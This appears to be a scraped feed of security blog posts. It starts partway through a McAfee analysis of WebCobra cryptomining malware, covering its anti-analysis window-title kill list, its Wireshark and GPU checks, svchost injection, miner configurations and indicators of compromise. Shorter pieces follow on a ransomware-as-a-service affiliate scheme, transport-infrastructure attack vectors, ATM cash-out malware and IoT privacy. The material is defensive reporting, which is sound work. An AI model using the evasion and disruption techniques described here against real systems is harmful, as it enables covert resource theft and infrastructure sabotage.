  • farbar
  • glax
  • delfix
  • rogue
  • exe
  • asw_av_popup_wndclass
  • snxhk_border_mywnd
  • AvastCefWindow
  • AlertWindow
  • UnHackMe
  • eset
  • hacker
  • AnVir
  • Rogue
  • uVS
  • malware

The open windows will be terminated if any of preceding strings shows in the windows title bar text.

Figure 8: Terminating a process if the windows title bar text contains specific strings.

Once the process monitor executes, it creates an instance of svchost.exe with the miner’s configuration file specified as an argument and injects the Cryptonight miner code.

Figure 9: Creating an instance of svchost.exe and executing the Cryptonight miner.

Finally, the malware resumes the process with the Cryptonight miner running silently and consuming almost all the CPU’s resources.

Figure 10: An x86 machine infected with the Cryptonight miner. 

Infecting an x64 system

The malware terminates the infection if it finds Wireshark running.

Figure 11: Checking for Wireshark.

The malware checks the GPU brand and mode. It runs only if one of the following GPUs is installed:

  • Radeon
  • Nvidia
  • Asus

Figure 12: Checking the GPU mode.

If these checks are successful, the malware creates the following folder with hidden attributes and downloads and executes Claymore’s Zcash miner from a remote server.

  • C:\Users\AppData\Local\WIX Toolset 11.2

Figure 13: Requesting the download of Claymore’s Zcash miner.

Figure 14: Claymore’s miner.

Figure 15: Executing the miner with its configuration file.

Finally, the malware drops a batch file at %temp%\–xxxxx.cMD to delete the main dropper from [WindowsFolder]\{DE03ECBA-2A77-438C-8243-0AF592BDBB20}\*.*.

Figure 16: A batch file deleting the dropper.

The configuration files of the miners follow.

Figure 17: Cryptonight’s configuration file.

This configuration file contains:

  • The mining pool: 5.149.254.170
  • Username: 49YfyE1xWHG1vywX2xTV8XZzbzB1E2QHEF9GtzPhSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C
  • Password: soft-net

Figure 18: Claymore’s Zcash miner configuration file.

This configuration file contains:

  • The mining pool: eu.zec.slushpool.com
  • Username: pavelcom.nln
  • Password: zzz

Coin mining malware will continue to evolve as cybercriminals take advantage of this relatively easy path to stealing value. Mining coins on other people’s systems requires less investment and risk than ransomware, and does not depend on a percentage of victims agreeing to send money. Until users learn they are supporting criminal miners, the latter have much to gain.

 

MITRE ATT&CK techniques

  • Exfiltration over command and control channel
  • Command-line interface
  • Hooking
  • Data from local system
  • File and directory discovery
  • Query registry
  • System information discovery
  • Process discovery
  • System time discovery
  • Process injection
  • Data encrypted
  • Data obfuscation
  • Multilayer encryption
  • File deletion

Indicators of compromise

IP addresses
  • 149.249.13:2224
  • 149.254.170:2223
  • 31.92.212
Domains
  • fee.xmrig.com
  • fee.xmrig.com
  • ru
  • zec.slushpool.com

McAfee detections

  • CoinMiner Version 2 in DAT Version 8986; Version 3 in DAT Version 3437
  • l Version 2 in DAT Version 9001; Version 3 in DAT Version 3452
  • RDN/Generic PUP.x Version 2 in DAT Version 8996; Version 3 in DAT Version 3447
  • Trojan-FQBZ, Trojan-FQCB, Trojan-FQCR Versions 2 in DAT Version 9011; Versions 3 in DAT Version 3462

Hashes (SHA-256)

  • 5E14478931E31CF804E08A09E8DFFD091DB9ABD684926792DBEBEA9B827C9F37
  • 2ED8448A833D5BBE72E667A4CB311A88F94143AA77C55FBDBD36EE235E2D9423
  • F4ED5C03766905F8206AA3130C0CDEDEC24B36AF47C2CE212036D6F904569350
  • 1BDFF1F068EB619803ECD65C4ACB2C742718B0EE2F462DF795208EA913F3353B
  • D4003E6978BCFEF44FDA3CB13D618EC89BF93DEBB75C0440C3AC4C1ED2472742
  • 06AD9DDC92869E989C1DF8E991B1BD18FB47BCEB8ECC9806756493BA3A1A17D6
  • 615BFE5A8AE7E0862A03D183E661C40A1D3D447EDDABF164FC5E6D4D183796E0
  • F31285AE705FF60007BF48AEFBC7AC75A3EA507C2E76B01BA5F478076FA5D1B3
  • AA0DBF77D5AA985EEA52DDDA522544CA0169DCA4AB8FB5141ED2BDD2A5EC16CE

The post WebCobra Malware Uses Victims’ Computers to Mine Cryptocurrency appeared first on McAfee Blogs.

Bank Attacks Put Password Insecurity Back in the Spotlight

Two separate attacks on banks in the United States and Pakistan revealed this week highlight once again the inherent weakness of a security practice that relies on passwords or knowledge-based credentials to protect critical information. International bank HSBC said it was a victim of a credential-stuffing and became aware of unauthorized access...

Read the whole entry... »

Related Stories

Ransomware-as-a-Service Program Offers Affiliates Up to 75 Percent of Revenue to Spread Infection

A ransomware-as-a-service program called FilesLocker is offering affiliates commissions of up to 75 percent on all revenue stolen from victims if they can drive enough traffic.

Details about FilesLocker were first posted on Twitter, but a subsequent investigation traced it to Chinese cybercrime forum on TOR, an anonymous online network. Written in C# and available in both Chinese and English, some of the features promoted in the forum include strong encryption, the ability to clear shadow volume copies and customization capabilities.

While FilesLocker is relatively unsophisticated in design, according to security researchers, it encrypts victims’ files through a private key, which is encrypted by an embedded public key. By scanning common system folders such as Documents and Pictures, the ransomware-as-a-service offering encrypts files with a .locked extension and then displays a note demanding 0.18 bitcoin as payment to a specific email address, along with an automatically generated victim ID for tracking purposes.

How Affiliates Qualify For FilesLocker Spoils

The developer behind FilesLocker stipulated that any interested affiliates should have a proven track record in distributing ransomware through phishing schemes or other methods, with a minimum of 10 infections a day. He or she also warned against uploading the program to any service that helps organizations automate the process of scanning for viruses and other security threats. While those who do particularly well can earn three-quarters of what’s gathered from victims, the program includes a base revenue share of 60 percent.

The practice of spreading ransomware through affiliates is becoming more common among cybercriminals. Back in August, for example, cybercriminals pitched a similar ransomware-as-a-service threat dubbed Princess Evolution to potential partners for the same 60 percent revenue share.

Containing Threats Like FilesLocker

While it’s common and natural to panic upon seeing a ransom note pop up on the screen, security leaders should train users to report such incidents as quickly as possible so they can minimize the potential spread of ransomware-as-a-service programs.

IBM Security’s “Ransomware Response Guide” advised security professionals to immediately disconnect any machine infected with ransomware from the corporate network, as well as any access to Wi-Fi or other services that could link back to the attacker.

Isolating a system can give the security team enough time to conduct a proper route cause analysis (RCA) to identify how the ransomware is being distributed, which may mean closing off email or other communication channels for at-risk employees. Since malware developers are starting to work as a team, their potential victims need to do the same.

Sources: BleepingComputer, Malware Hunter, Virus Total

The post Ransomware-as-a-Service Program Offers Affiliates Up to 75 Percent of Revenue to Spread Infection appeared first on Security Intelligence.

Compromising vital infrastructure: transport and logistics

Back when I was a dispatcher for a courier and trucking company, we used to joke that it only took a few strategically-placed accidents to cause a traffic jam that could completely stop circulation around the city of Rotterdam.

Rotterdam is one of the major ports in the world and consequently, there is a lot of traffic coming in and out. The roads around the city can handle normal traffic, but they get congested during rush hours and when accidents happen. If you live or work near a city, you’re probably also stuck in a traffic jam on a regular basis.

In our series about vital infrastructure, this time we’re looking at transportation. And if you think transport is not that vital, you are underestimating the logistical processes that make getting to and from different locations possible.

In this post, we will focus on the main skeleton of our logistics infrastructure: the mass transportation of goods over the surface of the earth. How do the goods that we use every day make their way into the warehouses, stores, or factories that need them? We will deal with air and public transportation separately, as they use completely different infrastructures in order to function.

Shipping by sea or ocean

A lot of the goods we consume are manufactured a long way from home. The first leg of their journey is typically transported by ship across international waters. When you realize that the largest container ships can carry over 20,000 20-foot containers, you can also imagine the amount of paperwork and computing needed to get every one of those containers to the correct destination. And every one of them must go through customs—usually twice. Customs will want to know exactly what is in them or they will delay transporting the containers until they do.

Throwing a wrench in an otherwise well-oiled machine like that can have dire consequences as Maersk, one of the largest shipping lines, learned the hard way when their organization was hit by NotPetya. Estimates of the damages done due to a “serious business interruption” were around $300 million. This interruption also caused a massive supply delay, ranging from hours to several days.

Critical information systems used during these processes could be targeted as a means to disrupt the logistics network, which can slow down or even bring to a halt an entire country’s economic system.

Trains and river shipping

Depending on existing connections and infrastructure, goods will be transported in masses from harbors to inland destinations typical by train or boat. Unlike driving, these modes of transport allow for few ways to maneuver around a blocked part of the route to the destination.

Since train or river transport are mainly used for larger amounts of goods, they are also viable to attacks on the administrative side. In addition, physical attack vectors can hinder transport and mess with logistics. Some examples include:

  • Cutting the power to a rail-track
  • Disabling the railway signals
  • Disabling rail traffic management systems
  • Gaining control over sluices or other means to control the water level in rivers and canals
  • Jamming radars, so ships will have to slow down to avoid collisions

Road transport

Although one truckload is small compared to the transportation modes we have discussed so far, attacks on major delivery firms like FedEx can be highly effective. In fact, the damages due to the NotPetya infection at their TNT division were in roughly the same region as those estimated by Maersk after the same infection.

Even though trucks have more options to avoid roadblocks than trains and riverboats, huge slow-downs can be caused by tactically-employed attacks at important infrastructures, such as tunnels, bridges and highway intersections. And you don’t need to cause accidents to accomplish this. Hacking traffic control systems is much less dangerous and possibly more effective means of disruption if you are able to implement it on a large scale.

red traffic light

Special parts of the logistics infrastructure

The first part we need to consider is the container terminals. The average daily yard utilization of large container terminals in Europe is about 10,000–20,000 containers, resulting in about 15,000 movements per day. Handling a container ship of the Post Panamax size requires about 150 moves per hour, which means using five cranes that are able to handle 30 moves per hour each. Planning and keeping track of all these movements is heavily computerized and therefore vulnerable to cyberattacks.

Of the thousands of ports worldwide, only about one hundred have a global importance. These ports are an attractive target for attack.

The second part is bunkering, which is an essential part of transport. Electric trucks and ships are still a rare commodity, so most of them will need to refuel at regular intervals. Cutting off oil supplies to a country that does not have the capacity to produce enough of its own is a sure way to stifle transport and bring its economy to a standstill.

Threats

Most of the cyberattacks we have seen to date that have had a major impact on transportation systems are ransomware attacks. These infections are hard to predict and, in some cases, hard to stop. But you can be sure that the logistics infrastructure will be a target in the case of a full-scale cyberwar.

So far, awareness of this fact alone hasn’t been enough to implement adequate countermeasures—at least not adequate enough to counter a ransomware infection like NotPetya. And let’s not forget that WannaCry threw Germany’s rail network into chaos, disrupted FedEx’s delivery unit, and wreaked havoc among many others.

If this much damage can be done by a mindless ransomware attack, can you imagine what kind of destruction a targeted APT could cause? If you can hinder the enemy’s ability to move goods, supplies, and troops, that is a big advantage in warfare. This fact about military logistics was known and implemented as far back as the American Civil War (1861–65), where both armies used railways extensively for transport of personnel, supplies, horses and mules, and heavy field pieces. Both sides tried to disrupt the enemy’s logistics by destroying trackage and bridges.

Paying the price

In a line of business like logistics, where every penny counts, cybersecurity may be one of the last things managers care about. But that doesn’t make it any less important. The damage done by an organization-wide ransomware infection can put companies out of business. Having to rebuild your network while the core business has to be conducted by hand (and memory) is not just frustrating; it’s costly. Recovering from a cyberattack requires time and attention that cannot be spent on other tasks.

Keeping transportation infrastructure itself safe and secure is a government task, since it is also a matter of national security to protect these assets during a cyberattack. The technology behind our infrastructure plays an important part in determining both the logistical capabilities and the control we have over them.

Spending on critical infrastructural improvements should include cybersecurity as an important consideration. Companies in logistics, from the major shipping lines down to the local trucking companies, are aware of the important task they are fulfilling, and should not shy away from taking a good hard look at their existing security measures. Do they reflect the importance of their business to the overall economy of the region? Are they prepared to survive a ransomware attack? Is their staff trained to recognize phishing attempts? Are their computer systems protected against malware and targeted attacks?

Trust us, the first time you need the protection, a strong cybersecurity policy, training program for employees, and technical solution will already have paid itself back a thousand times.

Stay safe, everyone!

The post Compromising vital infrastructure: transport and logistics appeared first on Malwarebytes Labs.

Destructive Attacks Spike in Q3, Putting Election Security at Risk

A new report revealed that nearly one-third of cyber incidents reported in Q3 2018 were classified as “destructive attacks,” putting election security at risk in the lead-up to the 2018 midterms.

In its “Quarterly Incident Response Threat Report” for November 2018, Carbon Black found that 32 percent of election-season cyberattacks were destructive in nature — that is, “attacks that are tailored to specific targets, cause system outages and destroy data in ways designed to paralyze an organization’s operations.” These attacks targeted a wide range of industries, most notably financial services (78 percent) and healthcare (59 percent).

In addition, the report revealed that roughly half of cyberattacks now leverage island hopping, a technique that threatens not noly the target company, but its customers and partners as well. Thirty percent of survey respondents reported seeing victims’ websites converted into watering holes.

Time to Panic About Election Security? Not So Fast

Despite these alarming statistics and the very real risks they signify, Cris Thomas (aka Space Rogue) of IBM X-Force Red told TechRepublic that since voting machines are not connected to the internet, a malicious actor would need physical access to compromise one. This could prove challenging for attackers, who must understand not only the vulnerabilities in each individual voting machine, but also each precinct’s policies.

Bad actors could theoretically stage an attack by obtaining an official voting machine before the election and gaining physical access to it on voting day, but these machines come with checks and balances that detect when votes are changed, decreasing the liklihood of a successful attack.

Attacks Are Growing Increasingly Evasive — and Expensive

Still, the rise in destructive attacks is particularly concerning given that, as reported by Carbon Black, attacks across the board are becoming more difficult to detect. In addition, 51 percent of cases involved counter-incident response techniques, and nearly three-quarters of participants specifically witnessed the destruction of logs during these incidents. Meanwhile, 41 percent observed attackers circumventing network-based protections.

These evasive tactics could prove costly for companies. According to Accenture, threat actors could set companies back as much as $2.4 million with a single malware incident, with cybercrime costing each organization an average of $11.7 million per year.

How to Defend Against Destructive Attacks

Security professionals can defend their organizations against destructive attacks by developing a dedicated framework to predict what steps an adversary might take once inside the network. Security teams should supplement this framework with AI tools that can use pattern recognition and behavior analysis to stay one step ahead of cyberthreats.

Sources: Carbon Black, Accenture, TechRepublic

The post Destructive Attacks Spike in Q3, Putting Election Security at Risk appeared first on Security Intelligence.

Cyber-Attacks: How to Stop a Multibillion-Dollar Problem

By Ed Cabrera, Chief Cybersecurity Officer for Trend Micro and Martin Bally, Vice President & Chief Security Officer for Diebold Nixdorf 

Where there’s money, there has always been crime. Traditional bank robbery and physical assaults on ATMs are still a challenge, and now a new breed of cyber-enabled theft—using ATMs as the endpoint for cash-outs— has become a multibillion-dollar problem. One recent raid saw $13.5m stolen from India’s Cosmos Bank. Although the FBI issued a warning about an impending “ATM cash-out” operation, it was too late; the bank was attacked just one day after the warning. So what can financial institutions do about a decade-long threat showing no signs of abating?

Cashing in on cash-outs

The FBI claimed that ATM cash-outs are often targeted against smaller banks which might not have the same budget to spend on cybersecurity as their larger counterparts. In the case of the Cosmos attack, and in Carbanak and Anunak cyberattacks, international gangs phish their way into back-end systems, exploiting network access to install malware that removes fraud controls such as maximum withdrawal amounts, transfer funds to other banks and increases customer balances. Dispersed gangs of mules then use cloned magstripe cards to withdraw the funds. In other cyber-attacks, such as ATM jackpotting, the software of the ATM itself is altered. The variety of approaches used by cyber-criminals reinforces the necessity of building a holistic, layered approach to security, which is inclusive of both the endpoint (ATM) and a bank’s entire internal software stack.

In the end, the FBI’s warning did nothing to help Pune-headquartered Cosmos Bank, as accomplices withdrew millions from ATMs in 28 countries around the world. It claimed the perpetrators had even managed to bypass internal transaction approval systems to enable the attack. But this was certainly not the first such cyber-attack: in 2013, cyber-criminals stole $45m from ATMs, and in 2016 over $12m was taken from cashpoints in Japan using cards cloned from a South African bank. That’s not to mention the activity of the infamous Carbanak gang, said to have been responsible for as much as $1bn in theft from banks around the world, using different attack methods also including the ATM as the cash-out point.

From physical to network-based attacks

These advanced network attacks differ from traditional ATM attacks which aim to either empty an ATM’s cash cassettes into the hands of waiting mules (jackpotting), or skim card details virtually or physically for later use or sale on the dark web. This meant installing secret cameras, card reader slots and PIN overlay pads to record/’skim’ lucrative card information, or opening up the ATM case to install malware manually via USB or CD-ROM. That malware is designed to send commands to the ATM via its XFS middleware, to dispense cash — the whole process perhaps taking as little as 10 minutes. Malware families such as Skimer, GreenDispenser, Ploutus, and Alice illustrate the continued popularity of onsite malware attacks.

However, back in 2016 Trend Micro and Europol documented another category of attacks gaining in popularity, leveraging the network as the entry point. Although these require a greater investment of time and resources up front, they’re less likely to raise suspicion as there’s no interference with the physical ATM itself. Instead, hackers infiltrate the bank’s network via malware-laden phishing emails, steal admin credentials and move laterally inside until they gain remote access to the ATMs. Multiple machines can be commanded to issue cash at the same time and some malware can even delete itself, making forensics harder. Ripper malware was the first of its kind spotted in these kind of network attacks.

Protecting your ATM network

ATM attacks continue to reap financial rewards for their perpetrators, which means we should not expect them to let up. In fact, the U.S. saw its first jackpotting attacks this year, and the FBI said of ATM cash-outs that it “expects the ubiquity of this activity to continue or possibly increase in the near future.”

Skimming alone is thought to be a $2bn+ industry-wide problem. Over the years, criminals have made skimmers smaller, smarter and virtually undetectable. And even as EMV compliance makes its way across the U.S. and around the globe, skimming remains one of the financial industry’s most costly problems.

So what can financial institutions do to protect funds and cardholder data? ATM attackers take advantage of many classic security lapses, such as credulous end users, lax password control, poor network segmentation and unpatched systems. A best practice approach should therefore include:

Regular updates to underlying OS and relevant software (eg. XFS).

Physical security for ATMs including tamper alarms on high risk machines; 2FA access control for technicians; regular service checks; anti-skimming modules.

Intrusion prevention and hard disk encryption to protect ATMs during operation.

Improved user education in how to spot phishing emails.

Network segmentation to make lateral movement harder inside the bank network.

Application control/whitelisting to further reduce risk of malware infection.

Continuous network monitoring to raise the alarm if there is a network intrusion.

As long as there is money to be had behind that metal casing, criminal gangs will always be looking for innovative ways to get to it. To stop them cashing in by cashing out at the ATM, we need to understand the risks and take time to plug in multi-layered defenses.

To find out more, read our report, co-authored with Europol: Cashing in on ATM Malware.

The post Cyber-Attacks: How to Stop a Multibillion-Dollar Problem appeared first on .

IoT Lockdown: Ways to Secure Your Family’s Digital Home and Lifestyle

Internet Of ThingsIf you took an inventory of your digital possessions chances are, most of your life — everything from phones to toys, to wearables, to appliances — has wholly transitioned from analog to digital (rotary to wireless). What you may not realize is that with this dramatic transition, comes a fair amount of risk.

Privacy for Progress

With this massive tech migration, an invisible exchange has happened: Privacy for progress. Here we are intentionally and happily immersed in the Internet of Things (IoT). IoT is defined as everyday objects with computing devices embedded in them that can send and receive data over the internet.

That’s right. Your favorite fitness tracking app may be collecting and giving away personal data. That smart toy, baby device, or video game may be monitoring your child’s behavior and gathering information to influence future purchases. And, that smart coffee maker may be transmitting more than just good morning vibes.

Gartner report estimated there were 8.4 billion connected “things” in 2017 and as many as 20 billion by 2020. The ability of some IoT devices is staggering and, frankly, a bit frightening. Data collection ability from smart devices and services on the market is far greater than most of us realize. Rooms, devices, and apps come equipped with sensors and controls that can gather and inform third parties about consumers.